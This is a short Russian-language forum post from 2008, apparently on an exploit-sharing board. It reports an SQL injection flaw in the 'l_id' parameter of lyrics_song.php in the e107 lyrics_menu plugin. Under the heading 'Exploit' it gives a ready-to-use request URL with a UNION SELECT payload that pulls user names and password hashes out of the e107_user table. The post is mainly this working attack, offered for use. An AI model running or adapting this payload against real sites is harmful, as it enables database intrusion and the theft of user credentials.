Показать сообщение отдельно

SQL-инъекция в e107 Plugin lyrics_menu
  #23  
Старый 31.10.2008, 23:04
KentPol
Участник форума
Регистрация: 03.06.2008
Сообщений: 111
Провел на форуме:
911872

Репутация: 36
Отправить сообщение для KentPol с помощью ICQ
По умолчанию SQL-инъекция в e107 Plugin lyrics_menu

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «l_id» сценарием lyrics_song.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:
PHP код:
http://localhost/script_path/lyrics_song.php?l_id=[SQL1] or [SQL2]

[SQL1] = column number 15

-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+e107_user-- 
 
Ответить с цитированием